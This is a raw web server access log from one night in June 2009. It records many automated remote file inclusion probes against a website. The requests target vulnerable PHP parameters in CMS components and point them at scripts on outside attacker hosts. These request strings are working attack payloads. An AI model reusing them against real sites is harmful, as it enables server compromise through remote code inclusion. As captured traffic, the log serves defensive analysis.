195.34.78.110 - - [28/Jun/2009:21:46:32 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:21:47:35 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:21:47:44 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:50:43 -0700] "GET /logs/access_090126.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:51:30 -0700] "GET /logs/access_090126.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
59.125.5.1 - - [28/Jun/2009:21:51:31 -0700] "GET /logs/access_090413.log/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
59.125.5.1 - - [28/Jun/2009:21:51:32 -0700] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
59.125.5.1 - - [28/Jun/2009:21:51:32 -0700] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:21:51:45 -0700] "GET /logs/access.log%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
151.1.219.156 - - [28/Jun/2009:21:51:45 -0700] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
151.1.219.156 - - [28/Jun/2009:21:51:45 -0700] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "vspeaking.com"
216.17.99.13 - - [28/Jun/2009:21:52:04 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.17.99.13 - - [28/Jun/2009:21:52:04 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.17.99.13 - - [28/Jun/2009:21:52:04 -0700] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:52:37 -0700] "GET /logs/access_090126.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:52:40 -0700] "GET /logs/access_090126.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.17.99.13 - - [28/Jun/2009:21:52:43 -0700] "GET /logs/access_090413.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:52:57 -0700] "GET /logs/access_090126.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:21:52:59 -0700] "GET /logs/access.log%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
151.1.219.156 - - [28/Jun/2009:21:52:59 -0700] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "vspeaking.com"
151.1.219.156 - - [28/Jun/2009:21:52:59 -0700] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:53:00 -0700] "GET /logs/access_090126.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:53:00 -0700] "GET /logs/access_090126.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:21:53:20 -0700] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
151.1.219.156 - - [28/Jun/2009:21:53:20 -0700] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "vspeaking.com"
151.1.219.156 - - [28/Jun/2009:21:53:21 -0700] "GET /logs/access.log%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
217.125.38.117 - - [28/Jun/2009:21:56:53 -0700] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://polombuo.ucoz.com/CHID.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
217.125.38.117 - - [28/Jun/2009:21:56:53 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://polombuo.ucoz.com/CHID.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
217.125.38.117 - - [28/Jun/2009:21:56:56 -0700] "GET /logs/access_090126.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://polombuo.ucoz.com/CHID.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:57:03 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:21:58:14 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:21:58:15 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:21:58:15 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:58:52 -0700] "GET /logs/access_090126.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://polombuo.ucoz.com/CHID.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:58:52 -0700] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://polombuo.ucoz.com/CHID.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:58:52 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://polombuo.ucoz.com/CHID.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:21:59:06 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "vspeaking.com"
65.23.158.226 - - [28/Jun/2009:21:59:06 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "vspeaking.com"
65.23.158.226 - - [28/Jun/2009:21:59:06 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "vspeaking.com"
38.117.93.134 - - [28/Jun/2009:21:59:39 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
38.117.93.134 - - [28/Jun/2009:21:59:39 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
38.117.93.134 - - [28/Jun/2009:21:59:40 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:59:42 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:00:09 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:00:09 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:00:10 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
38.103.48.109 - - [28/Jun/2009:22:01:15 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
38.103.48.109 - - [28/Jun/2009:22:01:15 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
38.103.48.109 - - [28/Jun/2009:22:01:15 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:01:46 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:01:55 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:01:55 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:03:29 -0700] "GET /logs/access_090126.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:22:03:31 -0700] "GET /logs/access.log/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:03:33 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:03:33 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:03:33 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:03:34 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:03:34 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:03:34 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
69.175.14.66 - - [28/Jun/2009:22:04:52 -0700] "GET /logs/access.log//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
69.175.14.66 - - [28/Jun/2009:22:04:52 -0700] "GET /?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
69.175.14.66 - - [28/Jun/2009:22:04:52 -0700] "GET /logs//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:22:05:08 -0700] "GET /logs/access_090413.log//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:22:05:08 -0700] "GET /?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:22:05:08 -0700] "GET /logs//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:22:05:10 -0700] "GET /logs/access.log/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:22:05:11 -0700] "GET /logs/access.log/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:22:05:18 -0700] "GET /?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:22:05:18 -0700] "GET /logs/access.log//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:22:05:18 -0700] "GET /logs//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:22:05:42 -0700] "GET /logs/access.log//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:22:05:42 -0700] "GET /logs//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:22:05:42 -0700] "GET /?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:05:50 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:05:50 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:05:50 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "vspeaking.com"
80.93.48.103 - - [28/Jun/2009:22:05:54 -0700] "GET /logs/access.log//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:22:05:54 -0700] "GET /?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:22:05:54 -0700] "GET /logs//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "www.vspeaking.com"
209.172.33.230 - - [28/Jun/2009:22:05:59 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
209.172.33.230 - - [28/Jun/2009:22:05:59 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
209.172.33.230 - - [28/Jun/2009:22:05:59 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:22:06:00 -0700] "GET /?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:22:06:00 -0700] "GET /logs/access.log//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [28/Jun/2009:22:06:00 -0700] "GET /logs//?sIncPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "www.vspeaking.com"
59.125.5.1 - - [28/Jun/2009:22:06:07 -0700] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
59.125.5.1 - - [28/Jun/2009:22:06:08 -0700] "GET /logs/access.log%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
59.125.5.1 - - [28/Jun/2009:22:06:11 -0700] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "vspeaking.com"
209.172.33.230 - - [28/Jun/2009:22:06:54 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:07:20 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:07:20 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:07:20 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:09:17 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:09:17 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:09:17 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:10:11 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:10:11 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:10:11 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:22:10:46 -0700] "GET /logs/access_090126.log//Neos_Chronos/header.php?base_folder=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
